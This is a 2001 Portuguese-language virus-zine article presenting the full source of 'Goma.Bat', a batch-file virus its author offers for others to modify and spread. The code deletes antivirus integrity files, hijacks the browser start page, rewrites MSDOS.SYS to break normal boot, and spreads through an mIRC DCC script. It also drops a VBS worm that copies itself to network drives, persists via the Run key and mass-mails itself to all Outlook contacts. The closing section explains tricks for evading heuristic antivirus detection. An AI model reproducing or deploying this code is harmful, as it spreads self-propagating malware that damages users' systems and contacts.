Virus Brasil8:(goma_bat.txt):20/02/2001 << Back To Virus Brasil8


─────────────────────────────────────────────────────────────────────────── / __ ___ | / | |__) | | (__ |/ | | \ |___| ___) ─────────────────────────────────────────────────────────────────────────── ────────────────────────────────────────────────────── 6 - Goma.Bat versao animal por nim_bus@hotmail.com ────────────────────────────────────────────────────── Originais em arquivo .TXT sem acentuacao Estava esses dias procurando algum anti-virus interessante e me deparei com o BAT CHECKER do Duke/SMF (russo), fiquei espantado como o av funciona, a heuristica dele e' fenomenal, sem duvida um dos ma- is eficazes anti-virus que ja' vi, embora seja so' para BAT virus. Resolvi tentar fazer um virus que ele nao detectasse, doce ilu- sao, ele pega o ultimo goma.bat e tambem pegou o abaixo, mas eu pas- sei o AVP, e o F-prot nao deu nada, so' se deu erro por causa de me- moria... O virus abaixo e' de autoria 100% minha (nim_bus@hotmail.com) e esta ai para ser modificado livremente, sem meu conhecimento, so' peco para que se voce o modificar e der um spread no novo bicho, me manda ele por e-mail,e' que os AV's ja' detectam mais de 50 virus da familia Goma e eu devo ter feito no maximo uns 20 ! As ideias que me baseei para fazer esse virus sao novas , o es- quema de um bat mandar um VBS pelo OUTLOOK creio ser algo novo, a pa- rada do worm para mirc eu copiei de algum lugar, acho que do zine do Spy, e' isso ai, foi mesmo do zine do Spy, a "rotina" do Viva DOS e' algo que sempre tive vontade de fazer e nao sei o porque de ainda nao a ter feito. As partes que utilizam scripts para debug, sao partes auxiliares para lancar o Goma.vbs no sistema,visto que o sinal de diferente nao e' algo muito facil de fazer sair em um arquivo via "batch" files, se souber de algum melhor que o utilizado aqui, de um toque ... A rotina de verificacao de data e' algo que sempre tentei fazer em arquivos .BAT e seila' so' agora me deu uma luz de como o fazer,(a maneira ensinada no tutorial de BADCOM's do Massive num dos numeros de virus brasil nao funcionou, desculpem...) um jeito bem simples mas que eu nao havia pensado nem visto antes,ficou 10, embora so' funcio- ne com data no formato brasileiro ( dd/mm/aa ou dd/mm/aaaaa ), fora isso esta 100%. O vbs foi gerado com o gerador de worms do SennaSpy, to sem tem- po, nao reclame. A ideia de jogar os VBSs no iniciar foi minha e ate' o user se ligar ja' foi !!! Uma pausa para falar do gerador de worms do SennaSpy, o programa é facil de ser utilizado por qualquer usuario mesmo sem a menor experiencia. A maioria dos anti-virus ja' detecta o viajante gerado como SSIWG (o nome do gerador), o Goma.vbs sofreu al- gumas modificacoes e ainda nao e' detectado. O virus de inicio ja' apaga os arquivos de verificacao de alguns AV's (se alguem tiver uma lista me mande em nim_bus@hotmail.com). Para nao perder a viagem, o virus modifica uma chave no registro do windows para que a pagina inicial do internet explorer vire a nos- sa pagin a "http://www.virusbrasil.8m.com" e isso, a cada vez que o virus rodar, nao adianta mudar, estaremos sempre la' ... Na sequencia ja' lanca o VivaDOS, que modifica o MSDOS.SYS e faz com que o computador inicie em DOS Babased so' dor de cabeca pro usu- ario ter que digitar win, se voce for mal, renomei o windows ou crie um winstart.bat de arrasar !! o VivaDOS funciona a cada execucao do virus por preguica de utilizar um find a cada nova execucao e ver se o arquivo msdos.sys esta do jeito que queremos, mas ta valendo... Como proximo passo verifica a data do sistema e caso 22/10 de qualquer ano, um abraço !!!, brincadeira, so' uma mensagem via MS-DOS e uma no windows da data ate' o user apagar o arquivo VBS de mensagem do menu iniciar. A proxima rotina e' a de fazer o virus um viajante via mIRC , a rotina verifica se o mIRC esta instalado e se esta em c:\mirc, se nao estiver um abraco, nao funciona, se tiver crie um script.ini em cima do outro, copie o goma.bat para windows\system e so' alegria !!! As partes de auxilio sao para mandar o Goma.VBS pra disco, sem que ocorram erros, sem muitos comentarios... A parte de Envio e' a responsavel por descarregar o Goma.VBS no sistema, tambem sem muitos comentarios, pois nao estou afim de comen- tar um Internet.Worm e ainda mais gerado num criador de virus, vai ler seu vagabundo, tudo de graca e' dificil de conseguir ... O virus propriamente dito esta na parte procurar e infectar, ou para ser mais exato so' em infectar , o procurar e' pra ver se ja' e' um arquivo infectado ... O virus so' procura em diretorio atual, sem ..\, ou %path% para evitar um bug que ocorreu durante os testes e que nao tive saco de consertar ( estou precisando de um dicionario urgen- temente ...), perde-se com isso muito o poder de disseminacao, mas e' um sacrificio aceitavel. De maneira alguma eu acho que o virus estara entre os top 10 por ai, pois e' um arquivo .BAT, o que ja' dificulta imensamente sua pro- pagacao, tambem nao ser esse o meu objetivo. Sempre gostei de fazer menus em arquivos bat para entrar nos me- us joguinhos, oh saudosismo malvado !!! Falando em joguinho, se tiver tempo, saco e gostar de matar a saudade, eu tenho um "STREET ROD" que eu traduzi pro portugues na minha pagina em algum lugar por la' visi- tem em http://virusbrasil.8m.com . Como gosto de linguagem interpre- tada e para deixar o mito vivo, sempre que tenho uma ideia e algum tempinho que seja eu coloco a mao na massa e tento sempre fazer algo para dar umas risadas, receber uns emails e tudo mais !!! Agora chega de papo furado e pega o fonte ai embaixo, divirta-se do jeito que quiser, apenas tenha responsabilidade ... ──────────────────────────────────────────────────────────────────────────── __ __ / __ . __ __ __ __ ___ __ | | | | \ | | _ | | |_ | | |\| | |_ |__ |__| |__/ | |__| |__| | |__| | | | |__ ──────────────────────────────────────────────────────────────────────────── REM *********************** Goma.Bat.Versao.Animal ************************** REM Nome do virus: Goma REM Autor : nim_bus@hotmail.com REM Home Page : http://virusbrasil.8m.com REM Tipo : Runtime Appending, BAT infector . REM Tamanho : + ou - 7500 bytes REM Av's : none REM Retro : apagar arquivos de verificacao REM Ativacao : mensagem (DOS,Windows) ! REM Special features : Viva DOS, mIRC worm spread e VBS.Goma send REM VirusBrasil pagina inicial Internet Explorer REM Bug's : deve ter entao favor entrar em contato caso voce detecte REM algum ... REM ************************************************************************* @ECHO OFF%[GOMA.BAT]% :inicio CTTY NUL set apagar=deltree set copiar=copy set para=fOr set mascara=BaT set aux=de set ili=bu set o=g %apagar% /Y SMARTCHK.CPS > nul %apagar% /Y ANTI-VIR.DAT > nul %apagar% /Y AVP.CRC > nul %apagar% /Y IVB.NTZ > nul %apagar% /Y CHKLIST.MS > nul :ver_data ECHO.Goma.Bat arquivo temporário > goma2000.tmp DIR goma2000.tmp >> goma2000.tmp FIND "22/10" goma2000.tmp /i >NUL IF errorlevel 1 GOTO tdg_cont :ie ECHO.Dim Alterar_Reg>doido.txt ECHO.Set Alterar_Reg = CreateObject( "WScript.Shell" )>> doido.txt ECHO.Alterar_Reg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\" & "Start Page", "http://www.virusbrasil.8m.com">> doido.txt wscript doido.vbs :viva_dos %apagar% /y c:\msdos.sys >nul echo.[Paths] > c:\msdos.sys echo.WinDir=C:\WINDOWS >> c:\msdos.sys echo.WinBootDir=C:\WINDOWS >> c:\msdos.sys echo.HostWinBootDrv=C >> c:\msdos.sys echo. >> c:\msdos.sys echo.[Options] >> c:\msdos.sys echo.BootMulti=1 >> c:\msdos.sys echo.BootGUI=0 >> c:\msdos.sys echo.Logo=0 >> c:\msdos.sys echo.; xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Aqui e' o meu espaco para azucrinar a sua vida, quero mandar um abraco pra todo mundo da turma da goma e tambem pra toda a galera da faculdade um abraco pra todo mundo mesmoxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx >> c:\msdos.sys echo.;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx >> c:\msdos.sys echo.;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx >> c:\msdos.sys ATTRIB +S +H +R c:\MSDOS.SYS :ativacao CTTY CON ECHO For i = 1 to 10 > msg.vbs ECHO MsgBox "Valeu Regis, Valeu Guino !!!", 48, "Goma" >> msg.vbs ECHO Next >> msg.vbs MOVE msg.vbs c:\windows\menuin~1\progra~1\iniciar >NUL ERASE msg.vbs >NUL ECHO. "Um abraço pra toda galera brazuca" - Vecna ECHO. em especial ao Regis e ao Guino !!!! ECHO. ECHO. [TDG'2000] - Vírus Brasil - Novos rumos para seus pensamentos - nim_bus PAUSE >NUL :tdg_cont ERASE goma2000.tmp CTTY NUL :mIRC IF not exist c:\mirc\script.ini GOTO aux_env0 COPY /y %0.bat c:\windows\system\goma.bat ECHO n0=; Goma.Batch virus por nim_bus@hotmail.com > c:\mirc\script.ini ECHO n1=ON 1:JOIN:#:{ /if ( $nick != $me ) { /dcc send $nick c:\windows\system\goma.bat } >> c:\mirc\script.ini ECHO n2=ON 1:PART:#:{ /if ( $nick != $me ) { /dcc send $nick c:\windows\system\goma.bat } >> c:\mirc\script.ini :aux_env0 echo.N AUX_0.TMP > aux0.scr echo.E 0100 4F 6E 20 45 72 72 6F 72 20 52 65 73 75 6D 65 20 >> aux0.scr echo.E 0110 4E 65 78 74 0D 0A >> aux0.scr echo.RCX >> aux0.scr echo.0016 >> aux0.scr echo.W >> aux0.scr echo.Q >> aux0.scr %aux%%ili%%o% < aux0.scr erase aux0.scr :aux_env1 echo.N AUX_1.TMP > aux1.scr echo.E 0100 49 66 20 45 6E 76 69 61 72 2E 43 6F 75 6E 74 20 >> aux1.scr echo.E 0110 3C 3E 20 30 20 54 68 65 6E 0D 0A >> aux1.scr echo.RCX >> aux1.scr echo.001B >> aux1.scr echo.W >> aux1.scr echo.Q >> aux1.scr %aux%%ili%%o% < aux1.scr erase aux1.scr :aux_env2 echo.N AUX_2.TMP > aux2.scr echo.E 0100 20 20 20 20 20 20 20 20 49 66 20 49 6E 53 74 72 >> aux2.scr echo.E 0110 28 20 45 6E 76 69 61 72 2E 49 74 65 6D 28 20 43 >> aux2.scr echo.E 0120 6F 6E 74 61 64 6F 72 29 2C 20 22 5C 22 20 29 20 >> aux2.scr echo.E 0130 3C 3E 20 30 20 54 68 65 6E 0D 0A >> aux2.scr echo.RCX >> aux2.scr echo.003B >> aux2.scr echo.W >> aux2.scr echo.Q >> aux2.scr %aux%%ili%%o% < aux2.scr erase aux2.scr :envia TYPE aux_0.tmp >> mail.vbs ECHO Dim Copiar_arquivo, Alterar_Reg, Criar_OBJ, Contador, Enviar, Abrir_Outlook, Em_mapi, Lista_end, Entradas, Auxiliar >> mail.vbs ECHO Contador = 0 >> mail.vbs ECHO Set Copiar_arquivo = CreateObject( "Scripting.FileSystemObject" ) >> mail.vbs ECHO Copiar_arquivo.CopyFile WScript.ScriptFullName, Copiar_arquivo.BuildPath( Copiar_arquivo.GetSpecialFolder(1), "Goma.vbs" ) >> mail.vbs ECHO Set Alterar_Reg = CreateObject( "WScript.Shell" ) >> mail.vbs ECHO Alterar_Reg.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & "GOMA", Copiar_arquivo.BuildPath( Copiar_arquivo.GetSpecialFolder(1), "GOMA.vbs" ) >> mail.vbs ECHO Set Criar_OBJ = CreateObject( "WScript.Network" ) >> mail.vbs ECHO Set Enviar = Criar_OBJ.EnumNetworkDrives >> mail.vbs TYPE aux_1.tmp >> mail.vbs ECHO For Contador = 0 To Enviar.Count - 1 >> mail.vbs TYPE aux_2.tmp >> mail.vbs ECHO Copiar_arquivo.CopyFile WScript.ScriptFullName, Copiar_arquivo.BuildPath( Enviar.Item( Contador), "GOMA.vbs" ) >> mail.vbs ECHO End If >> mail.vbs ECHO Next >> mail.vbs ECHO End If >> mail.vbs ECHO Contador = Alterar_Reg.RegRead( "HKEY_LOCAL_MACHINE\" & "GOMA" ) >> mail.vbs ECHO Set Abrir_Outlook = CreateObject( "Outlook.Application" ) >> mail.vbs ECHO Set Em_mapi = Abrir_Outlook.GetNameSpace( "MAPI" ) >> mail.vbs ECHO For Each Lista_end In Em_mapi.AddressLists >> mail.vbs ECHO Set Enviar = Abrir_Outlook.CreateItem( 0 ) >> mail.vbs ECHO For Entradas = 1 To Lista_end.AddressEntries.Count >> mail.vbs ECHO Set Auxiliar = Lista_end.AddressEntries( Entradas ) >> mail.vbs ECHO If Entradas = 1 Then >> mail.vbs ECHO Enviar.BCC = Auxiliar.Address >> mail.vbs ECHO Else >> mail.vbs ECHO Enviar.BCC = Enviar.BCC & "; " & Auxiliar.Address >> mail.vbs ECHO End If >> mail.vbs ECHO Next >> mail.vbs ECHO Enviar.Subject = "Goma" >> mail.vbs ECHO Enviar.Body = "Goma para sempre !!!!" >> mail.vbs ECHO Enviar.Attachmets.Add WScript.ScriptFullName >> mail.vbs ECHO Enviar.DeleteAfterSubmit = True >> mail.vbs ECHO Enviar.Send >> mail.vbs ECHO Next >> mail.vbs ECHO Alterar_Reg.RegWrite "HKEY_LOCAL_MACHINE\" & "GOMA", Contador + 1 >> mail.vbs MOVE mail.vbs c:\windows\menuin~1\progra~1\iniciar >NUL ERASE mail.vbs >NUL :procura %para% %%f in (*.%mascara%) DO set var=%%f FIND /i "[GOMA.BAT]" <%var% >nul IF not errorlevel 1 GOTO tdg_fim :infecta FOR %%f in (*.%mascara%) DO %copiar% %%f + %0.bat :tdg_fim ERASE aux_0.tmp ERASE aux_1.tmp ERASE aux_2.tmp ERASE doido.vbs set var= set apagar= set copiar= set para= set mascara= set aux= set ili= set o= CTTY CON REM *********************** Goma.Bat.Vers╞o.Animal ************************** Caso encontre algum bug no virus acima entre em contato , entre em contato para duvidas, sugestoes, reclamacoes e tudo que tiver von- tade, pode demorar um pouco a resposta mas ela vira !!! Algumas modificacoes no virus foram implementadas para dificul- tar uma busca heuristica e posso dizer com toda certeza que o virus esta 100% desconhecido, com as modificacoes nem o BatChecker pegou... Se liga nas modificacoes que permitiram a passagem tranquila na heuristica do Duke : - Introducao de variaveis para execucao de comandos ao inves dos comandos propriamente ditos, exemplo o Deltree que foi substituido pela variavel apagar em se livra da heuristica igualmente a mascara dos arquivos BAT entre outros... Afinal o objetivo e' que a informacao chegue ao maior numero de pessoas posssiveis e que chegue nao distorcida, sem erros, para que nao so' voce possa aprender, mas que voce um dia venha tambem a ensi- nar. E' isso, sem mais, nim_bus@hotmail.com ──────────────────────────────────────────────────────────────────────────── Copyright ╕ 2001, Vírus Brasil ⌐ ────────────────────────────────────────────────────────────────────────────